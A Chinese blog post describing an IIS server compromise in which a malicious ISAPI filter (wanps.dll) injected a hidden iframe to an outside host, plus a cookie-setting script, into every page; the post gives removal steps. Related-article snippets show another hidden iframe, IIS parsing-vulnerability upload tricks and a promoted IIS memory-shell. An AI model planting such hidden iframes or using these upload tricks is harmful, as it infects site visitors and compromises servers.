IIS木马处理

最新推荐文章于 2024-04-08 09:45:00 发布
最新推荐文章于 2024-04-08 09:45:00 发布
阅读量1.5k 收藏
点赞数
文章标签: iis iframe javascript asp.net 扩展 服务器
<body>
< iframe   src=" http://css.scriptt.in/" height=0 width=0></ iframe >
< script   language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
documents.cookie="GAG5=1234567fuck;expires="+expires.toGMTString();
-->
</ script >
</body>

原以为是人为的,只是一个站点被修改了,结果经检查整个IIS上20多个站点全部中标,无一漏网..
网上查找了一下,询问此事的人多,真正解答的确少。
病毒症状:

经检查发下以下资料被更改

在IIS服务扩展里“ISAPI筛选器”增加了一个值,路径为:C:/..../SYSTEM32/inetsrv/wanps.dll
按路径找到该文件夹,发现里边共多出2个文件:wanps.dll     wanps.ini
而wanps.ini 内容指向: Redirector=C:/windows/help/wanps.txt
找到wanps.txt发现里边内容就是网页代码出多出的部分
每当IIS重启时木马会自动加载。
解决办法:
删除这3个文件,如果wanps.dll删不掉的话,重启IIS,就可以了
在ISAPI筛选器扩展里增加asp.net正常值(不同的服务值也不一样),这样IIS就正常了。
服务器管理员们应该注意加强安全管理了,不要给这些小人可乘之机。 
Fengxinz
关注
iis问题汇总(网页被arp木马篡改的问题)
sqhai2008的专栏
09-25 1716
<br /> <br />微软的东西就是树大招风啊,病毒的重点攻击目标.问题解决如下:<br />  1.iis服务器不稳定,有的网页能开,有的显示500错误,不是帐号同步问题,没办法,重装n遍iis搞定<br />  2.BLOG显示ACCESS数据库连接错,问题出在WINDOWS的临时文件夹,估计网页调用数据库需要在TEMP目录缓存,必须给该目录IUSR用户的读写权限.<br />  3.最挠头的问题来了,症状:客户机打开的网页查看源代码都被加了一行< frame src=’http://iii.832
【红队利器】——某黑产团伙的IIS内存马源码
最新发布
4SecNet团队专栏
02-22 329
近期,我们追踪了某黑产团伙的一起攻击活动,发现该黑产团伙有能力劫持IIS服务器上的所有请求,并针对特定请求伪造特殊返回包,从而实现流量劫持、命令执行、黑帽SEO等功能。我们定位到该团伙通过IIS流量劫持的模块开发技术实现了全局HTTP流量劫持。目前团队已经开通知识圈子,圈子内部会不定期发布前沿的红蓝对抗技巧、免杀系列内容,同时还会不定期开放关于逆向学习相关课程和课件。除此之外圈子也作为一个平台,为大家创建一个技术交流的渠道,欢迎有兴趣的伙伴、也欢迎希望找到同频人的伙伴加入圈子。✅。
Windows服务器下查IIS被挂iframe木马
weixin_34279184的博客
06-26 546
我同学的一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了   <iframe src=http://kaixinba871a.com/w/h5.htm width=100 height=0></iframe>   这种样式的代码 有的在头部 有的在尾部 部分杀毒软件打开会报毒   打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码   ...
IIS如何防ASP木马
yushijie的专栏
06-21 1660
IIS是Internet Information Server的简称。IIS作为当今流行的Web服务器之一,提供了强大的Internet和Intranet服务功能,然而在ASP木马程序泛滥的今天,如何加强IIS的安全机制,建立一个高安全性能的Web服务器,已成为IIS设置中不可忽视的重要组成部分。笔者就工作中的个人经验,与各位朋友交流商讨,如有不当之处,还望指教。   由于技术条件的限制,目前大
IIS 被挂马了,如何处理
liwendong528的专栏
08-01 2210
什么现象是IIS挂马? (前提)网站程序没有发现被挂马的文件, 但是访问网站的时候,页面会突然跳转到到别的网站去 网站会出现莫名奇妙的链接,图片,页面等。 网站域名经常会有错误的,甚至是莫名奇妙的地址访问(有的时候是扫漏洞,但是次数多了,就是被挂马,域名被反利用了) IIS的重要文件夹 C:\inetpub\ : IIS文件的操作历史,日志,默认文件 C:\inetpub\history: IIS配置文件更改历史记录 C:\Windows\System32\inetsrv...
木马IIS Unicode漏洞攻击实验
qq_62016430的博客
04-08 1162
学到了很多,比如远程的木马攻击是怎么实现的,以及黑客是怎么入侵网页的。在生活中,不要点击不明应用程序,特别是邮件发来的,很有可能是钓鱼邮件。还要注意自己文件的权限,要有限度,不要谁都能改,不然很容易被入侵。最重要的,是培养好网安意识,并开启杀软等工具,能有效避免黑客入侵、木马种植等。在1. 确认 IIS 的版本,并访问 IIS 网页。,一开始找不到,后面发现既可以在开始菜单找到,又可以win+r找到。在2.3 在攻击方利用木马,启动项目没反应,实际上是成功启动了,只不过一闪而过就是说明执行成功。
防止aspxspy木马列服务 iis信息 执行命令提权等操作
09-30
本文主要探讨如何防止ASPXSPY木马列服务、获取IIS信息以及执行命令提权等操作,确保服务器的安全稳定运行。 #### 一、ASPXSPY木马简介 ASPXSPY是一种专门针对Microsoft IIS Web服务器的恶意软件,它能够通过Web...
IIS畸形文件漏洞利用上传木马的技巧
iis畸形文件漏洞上传木马技术研究 IIS畸形文件漏洞是一种常见的Web应用漏洞,攻击者可以利用该漏洞上传木马,从而控制网站服务器。下面是关于IIS畸形文件漏洞的详细介绍和相关知识点。 一、IIS畸形文件漏洞的定义 ...
网站安全狗IIS版:服务器流量监控与木马拦截专家
它集成了服务器流量监控和木马拦截功能,旨在帮助网站管理员及时发现并处理服务器潜在的安全威胁,防止非法侵入和数据泄露等安全事件。 ### 知识点详解: 1. **网站安全狗IIS版的核心功能**: - **服务器流量监控...
服务器版本信息泄露修改iis,IIS攻击与安全加固实例分析 -电脑资料
weixin_39633774的博客
08-12 2223
IIS作为一款流行的Web服务器,在当今互联网环境中占有很大的比重,绝大多数的aspasp.net网站都运行在它上面,管理员的安全意识不高或技术上的疏忽而惨遭毒手。本文通过实例来谈谈针对IIS的攻击技术与安全加固措施。攻击实例IIS写权限漏洞利用我们先通过一个攻击实例来演示如何利用IIS权限配置不当来快速攻陷一个网站,以此来提高广大读者对IIS安全性的重视。目标网站IP:192.168.1.10...
服务器挂马清理实例
wwwwestcn的博客
04-08 532
网站通过百度搜索访问,会跳转到异常网站。 经过仔细分析、核实,确定是被挂马造成,但网页源文件中、使用安全工具扫描都没有发现异常代码。 新建空文件1.html,使用工具测试也显示挂马,说明是系统层面问题。 经查看站点设置等信息,发现iis站点》模块被加入了异常dll,如图 根据经验,%windir%开头的路径是系统自动加的,理论上没有问题;如果是c:\windows要重点核实。 经过分析,此文件是木马病毒文件。 删除模块加载,并删除文件,重启iis后测试,挂马消失。
Windows安全设置IIS防WebShell木马(转)
zhangmiaoping23的专栏
11-27 2306
转:http://blog.onovps.com/archives/iis-aspspy.html 1.ASP环境禁用Webshell危险的组件: 1 2 3 4 5 6 7 8 regsvr32 /u wshom.ocx #卸载WScript.Shell 组件 regsvr32 /u shell32.dll #卸载Shell.application
如何防范基于IISASP网页木马
My Server
05-23 750
<br />大部分ASP木马都是基于FileSystemObject和shell.application两个组件来完成所有控制操作的,它们均具有远程删除、新建、修改文件或文件夹的功能,具有比较大的破坏力。作为网络管理员来说一定要将网页木马的遗留场所进行封存,本文将逐步说明如何禁掉上面提到的两个组件,并将这些组件设置为只容许管理者一人使用。  <br />  当某些程序需要使用这两个组件时该怎么办呢?其实我们可以通过注册表修改组件的Progid值来实现。   <br /><br />         第一步:
IISASP木马怎么上传的
xiuzhentianting的博客
09-14 1109
在 Windows 2003下 IIS 6.0有两个漏洞: IIS解析漏洞1:   在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。 IS解析漏洞2:   网站上传图片的时候,将
IIS 服务器常见漏洞
热门推荐
Beret-81的博客
03-29 1万+
IIS 服务器常见漏洞IIS介绍:目录解析漏洞 IIS介绍: IIS是Internet Information Services的缩写,意为互联网信息服务,是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 IIS目前只适用于Windows系统,不适用于其他操作系统。 目录解析漏洞 在 IIS5.x/6.0 中,默认会将 .asp.asa、.cer、.cdx )目录下...
关于IIS部署webservice出现 未能加载xxx.dll或者程序集或者它的依赖项
丘鸣山的博客
03-03 2686
1,一开始,我一直以为是iis版本不支持我这个高版本的dll文件,所以使用了低版本的生成dll文件还是报错,如图 找了许多资料都是叫我修改iis程序支持.netframework版本 然后 还是不管用,原因是我部署的服务器居然是32位的系统,所以最后解决方式就是将生成程序改为x86生成,就行了。 操作如下, 最好把,Debug和Release都改为x86,然后生...
网站服务器中病毒或被***怎么办?
weixin_34258838的博客
08-23 321
网站服务器中毒或被***,用户访问网站时自动下载病毒,杀毒软件弹出病毒的提示。还有的网站只是被篡改,在网站代码中加入很多链接,不容易发现。 网站服务器中毒或被***以下几种情况导致的:第一种情况:网站存在文件上传漏洞,导致×××可以使用这漏洞,上传×××文件。然后×××可以对该用户网站所有文件进行任意修改,这种情况比较普遍。针对这种情况, 用户需要找技术人员。检查出网站漏洞并彻底修复,并检查看网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值